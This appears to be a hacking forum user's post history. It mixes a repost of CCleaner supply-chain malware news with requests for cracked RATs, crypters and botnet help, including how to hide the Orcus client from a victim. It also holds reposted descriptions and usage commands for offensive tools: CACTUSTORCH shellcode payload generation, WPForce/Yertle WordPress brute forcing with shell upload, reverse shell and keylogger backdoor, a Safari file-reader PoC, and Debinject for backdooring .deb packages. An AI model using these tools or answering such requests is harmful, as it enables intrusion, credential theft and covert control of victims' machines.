Sub Zero


  1. Sub Zero

    GalaxyWorkstation 1.5.0.4

    download link not working
  2. Sub Zero

    Proxy Shark 2018 v1.4 (Vip Pro Edition)

    Wrong rar password.
  3. Sub Zero

    CCleaner Hacked to Distribute Malware

    If you have downloaded or updated the CCleaner application on your computer between August 15 and September 12 of this year from its official website, then pay attention: your computer has been compromised.

    CCleaner is a popular application with over 2 billion downloads, created by Piriform and recently acquired by Avast, that allows users to clean up their system to optimize and enhance performance.

    Security researchers from Cisco Talos discovered that the download servers used by Avast to let users download the application were compromised by some unknown hackers, who replaced the original version of the software with a malicious one and distributed it to millions of users for around a month.

    This incident is yet another example of a supply chain attack. Earlier this year, update servers of a Ukrainian company called MeDoc were also compromised in the same way to distribute the Petya ransomware, which wreaked havoc worldwide.

    Avast and Piriform have both confirmed that the Windows 32-bit version of CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 were affected by the malware.

    Detected on 13 September, the malicious version of CCleaner contains a multi-stage malware payload that steals data from infected computers and sends it to the attacker's remote command-and-control servers.

    Moreover, the unknown hackers signed the malicious installation executable (v5.33) using a valid digital signature issued to Piriform by Symantec and used a Domain Generation Algorithm (DGA), so that if the attackers' server went down, the DGA could generate new domains to receive and send stolen information.

    "All of the collected information was encrypted and encoded by base64 with a custom alphabet," says Paul Yung, V.P. of Products at Piriform. "The encoded information was subsequently submitted to an external IP address 216.126.x.x (this address was hardcoded in the payload, and we have intentionally masked its last two octets here) via a HTTPS POST request."

    The malicious software was programmed to collect a large number of user data, including:

      • Computer name
      • List of installed software, including Windows updates
      • List of all running processes
      • IP and MAC addresses
      • Additional information like whether the process is running with admin privileges and whether it is a 64-bit system

    According to the Talos researchers, around 5 million people download CCleaner (or Crap Cleaner) each week, which indicates that more than 20 million people could have been infected with the malicious version of the app.

    "The impact of this attack could be severe given the extremely high number of systems possibly affected. CCleaner claims to have over 2 billion downloads worldwide as of November 2016 and is reportedly adding new users at a rate of 5 million a week," Talos said.

    However, Piriform estimated that up to 3 percent of its users (up to 2.27 million people) were affected by the malicious installation.

    Affected users are strongly recommended to update their CCleaner software to version 5.34 or higher, in order to protect their computers from being compromised. The latest version is available for download here.

    Source: [Hidden Content]
  4. Hello my friends. Request a code to disable the Registry Editor.
  5. Sub Zero

    Hac Tool Fud Encrypt server H-worm (vbs files) v1.0

    Re: Hac Tool Fud Encrypt server H-worm (vbs files) v1.0 rar pass please
  6. Sub Zero

    CrypterHacker The Are Live!!

    Re: CrypterHacker The Are Live!! Greetings to you thank_you
  7. Sub Zero

    Orcus RAT v1.9.1 Cracked by de4d0t and TheProxy

    Re: Orcus RAT v1.9.1 Cracked by de4d0t and TheProxy [Hidden Content]
  8. Payload Generation with CACTUSTORCH

    CACTUSTORCH is a framework for payload generation that can be used in adversary simulation engagements, based on James Forshaw's DotNetToJScript tool. This tool allows C# binaries to be bootstrapped inside a payload, providing reliable means to bypass many common defences.

    Currently CACTUSTORCH supports the following payload types:

      • VBS
      • VBA
      • JS
      • JSE
      • WSF
      • HTA
      • VBE

    Prior to this, it was not possible to invoke shellcode injection directly from multiple formats, with the exclusion of VBA macros (more on this later in the post). CACTUSTORCH has a self-contained C# binary which accepts a binary name and base64 encoded shellcode to inject. Additionally, it borrows concepts from @armitagehacker / CobaltStrike's VBA macro injection, whereby it selects the 32 bit executable to inject into.

    State of Current Payloads

    Generation of payloads for the supported formats already exists in several frameworks, including Metasploit and Cobalt Strike. There are however some drawbacks to how these payloads are generated.

    In Metasploit framework the following payload formats work as such:

      • VBS: File drop and execute – Touches disk.
      • HTA-PSH: Runs powershell.exe with a WScript.Shell object – Powershell.exe and WScript.Shell are well known to blue team.
      • VBA-EXE: File drop and execute – Touches disk.
      • VBA: Shellcode injection by declaring Kernel32 API – Known indicators for Maldoc scanning.
      • VBA-PSH: Runs powershell.exe with a Shell object – Powershell.exe is well known to blue team.

    In CobaltStrike, the following payload formats work as such:

      • VBS: Weakens the target, creates a COM object to Excel, creates a worksheet, injects VBA macro code and executes – Relies on Office being installed and Kernel32 API declarations in injected VBA.
      • VBA: Shellcode injection by declaring Kernel32 API – Known indicators for Maldoc scanning.
      • HTA-EXE: File drop and execute – Touches disk.
      • HTA-PSH: Runs powershell.exe with a WScript.Shell object – Powershell.exe and WScript.Shell are well known to blue team.
      • HTA-VBA: Wraps around a VBS that does the weakening, COM object to Excel, macro injection of Kernel32 API declaration VBA code.

    Benefits of CACTUSTORCH

    CACTUSTORCH offers a number of improvements on current payload generation that are currently beyond the capabilities of the public frameworks:

      • Does not use Kernel32 API declarations in the payload.
      • Obfuscated within the C# binary.
      • Allows for arbitrary specification of target binary to spawn.
      • Allows for arbitrary shellcode to be specified.
      • Does not spawn PowerShell.exe.
      • Does not require Powershell.
      • Does not require Office.
      • Does not invoke WScript.Shell.
      • Does not require staging, as the full stageless shellcode can be contained within the delivered payload.
      • No static parent to child spawn; the user can change what wscript.exe spawns. exe spawning Powershell.exe is suspicious, spawning rundll32.exe is arguably less indicative of compromise. You can change this to calc.exe, ping.exe /t or similar less suspicious binaries.

    Using CACTUSTORCH

    Using CACTUSTORCH is relatively straightforward; the following outlines the steps required to generate a custom payload:

      1. Select the payload format you want to use from the cloned directory.
      2. Select a binary container you want to inject into; it has to exist in both SYSWOW64 and SYSTEM32.
      3. Generate raw shellcode for your listener:
         $> cat payload.bin | base64 -w 0 > out.txt
      4. Copy the out.txt base64 raw payload into the "code" variable of the template.
      5. If doing it for the VBA, run the out.txt through vbasplit.py out.txt split.txt, then copy the split.txt into the code section highlighted in the VBA template.
      6. Payload is ready.
      7. Do obfuscation if you want.

    A video demonstrating these steps is shown below.

    Integration with Cobalt Strike

    As part of the process for streamlining adversary simulation engagements, so that more time can be placed into creating more sophisticated and bespoke attacks, Vincent has created a CACTUSTORCH aggressor script to facilitate this. After loading the aggressor script, the following menu is presented as an option under the "Attack" tab. You can now select the payloads you want to use and options; it will generate the payload and host it for you. In terms of the VBA code, it will be presented in a textbox where it can be copied from and pasted into a Word VBA Macro.

    The aggressor script is demonstrated in the following video: [video=youtube;_pwH6a-6yAQ]

    Credits

    The scripts, proof of concepts and aggressor script addon were created by Vincent Yiu of the ActiveBreach team. We would like to also thank the following people for their contributions:

      • @tiraniddo: James Forshaw for DotNet2Jscript
      • @cn33liz: Inspiration with StarFighters
      • @armitagehacker: Raphael Mudge for the idea of selecting the 32 bit version on 64 bit architecture machines for injection into
      • @_RastaMouse: Testing and giving recommendations around README

    CACTUSTORCH can be downloaded from the MDSec ActiveBreach github page.

    Source: [Hidden Content]
  9. About: WPForce is a suite of Wordpress attack tools. Currently this contains 2 scripts: WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post exploitation modules. For more information, visit the blog post here: [Hidden Content]

    Features:

      • Brute Force via API, not login form, bypassing some forms of protection
      • Can automatically upload an interactive shell
      • Can be used to spawn a full featured reverse shell
      • Dumps WordPress password hashes
      • Can backdoor authentication function for plaintext password collection
      • Inject BeEF hook into all pages
      • Pivot to meterpreter if needed

    Install: Yertle requires the requests library to run.

    [Hidden Content]:

      python wpforce.py -i usr.txt -w pass.txt -u "[Hidden Content]"

    Example output (ASCII banner omitted):

      Brute Force Attack Tool for Wordpress ~n00py~
      Username List: usr.txt (3)
      Password List: pass.txt (21)
      URL: [Hidden Content]
      --------------------------
      [xxxxxxxxxxxxx@gmail.com : xxxxxxxxxxxxx] are valid credentials! - THIS ACCOUNT IS ADMIN
      --------------------------
      --------------------------
      [xxxxxxxxxxxxx@icloud.com : xxxxxxxxxxxx] are valid credentials!
      --------------------------
      100% Percent Complete
      All correct pairs: {'xxxxxxxxxxxxx@icloud.com': 'xxxxxxxxxxxxx', 'xxxxxxxxxxxxx@gmail.com': 'xxxxxxxxxxxxx'}

    wpforce.py options:

      -h, --help                        show this help message and exit
      -i INPUT, --input INPUT           Input file name
      -w WORDLIST, --wordlist WORDLIST  Wordlist file name
      -u URL, --url URL                 URL of target
      -v, --verbose                     Verbose output. Show the attempts as they happen.
      -t THREADS, --threads THREADS     Determines the number of threads to be used, default is 10
      -a AGENT, --agent AGENT           Determines the user-agent
      -d, --debug                       This option is used for determining issues with the script.

      python yertle.py -u "[username]" -p "[password]" -t "[Hidden Content]" -i

    Example output (ASCII banner omitted):

      Post-exploitation Module for Wordpress ~n00py~
      Backdoor uploaded!
      Upload Directory: ebwhbas
      os-shell>

    yertle.py options:

      -h, --help                            show this help message and exit
      -i, --interactive                     Interactive command shell
      -r, --reverse                         Reverse Shell
      -t TARGET, --target TARGET            URL of target
      -u USERNAME, --username USERNAME      Admin username
      -p PASSWORD, --password PASSWORD      Admin password
      -li IP, --ip IP                       Listener IP
      -lp PORT, --port PORT                 Listener Port
      -v, --verbose                         Verbose output.
      -e EXISTING, --existing EXISTING      Skips uploading a shell, and connects to existing shell

    Yertle currently contains these modules:

    Core Commands
    =============
      Command      Description
      -------      -----------
      ?            Help menu
      beef         Injects a BeEF hook into website
      dbcreds      Prints the database credentials
      exit         Terminate the session
      hashdump     Dumps all WordPress password hashes
      help         Help menu
      keylogger    Patches WordPress core to log plaintext credentials
      keylog       Displays keylog file
      meterpreter  Executes a PHP meterpreter stager to connect to metasploit
      quit         Terminate the session
      shell        Sends a TCP reverse shell to a netcat listener
      stealth      Hides Yertle from the plugins page

    Download WPForce-master.zip

    Source: [Hidden Content]
  10. Sub Zero

    Safari local file reader

    How to start

    Clone files:
      $ git clone git@github.com:Bo0oM/Safiler.git
      $ cd Safiler

    Run server:
      $ [sudo] pip install -r requirements.txt
      $ python server.py

    Open PoC: open PoC.xhtm or PoC.webarchive in Safari. Copy it on a USB flash drive and carry it with you.

    Demo

    Source: [Hidden Content]
  11. Sub Zero

    Debinject

    [DEBINJECT] Copyright 2017 Debinject
    Written by: Alisson Moretto - 4w4k3 - UndeadSec

    TOOL DESIGNED FOR GOOD PURPOSES, PENTESTS, DON'T BE A CRIMINAL! Only download it here, do not trust other places.

    CLONE
      git clone [Hidden Content]

    RUNNING
      cd Debinject
      python debinject.py

    If you have another version of Python:
      python2.7 debinject.py

    RUN ON TARGET SIDE
      chmod 755 default.deb
      dpkg -i backdoored.deb

    DISCLAIMER
    "DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." Taken from LICENSE.

    PREREQUISITES
      • dpkg
      • dpkg-deb
      • metasploit

    TESTED ON
      • Kali Linux - SANA
      • Kali Linux - ROLLING

    SCREENSHOT
    More in Screens

    CONTRIBUTE
    Send me more features if you want. I need your help to make it better.

    LICENSE: This project is licensed under the BSD-3-Clause - see the LICENSE file for details.

    Source: [Hidden Content]
  12. Sub Zero

    Solar Botnet || Coded IN Pascal

    Re: Solar Botnet || Coded IN Pascal

    Gentlemen, I'm sorry for the stupid questions. So I cannot understand the Solar Bot commands. Explain, please, what to write in the fields:
      1) Parametr
      2) Limit
      3) Bot GUID
  13. Re: How to prevent Orcus Client from appearing in the taskbar (victim) Yes, it succeeded. Thank you.
  14. Hello my friends. How to prevent Orcus Client from appearing in the taskbar (victim)?
  15. Sub Zero

    Tutorial Crypter en Autoit BY Blau

    Re: Tutorial Crypter en Autoit BY Blau Compile error (builder and stub): builder error, stub error.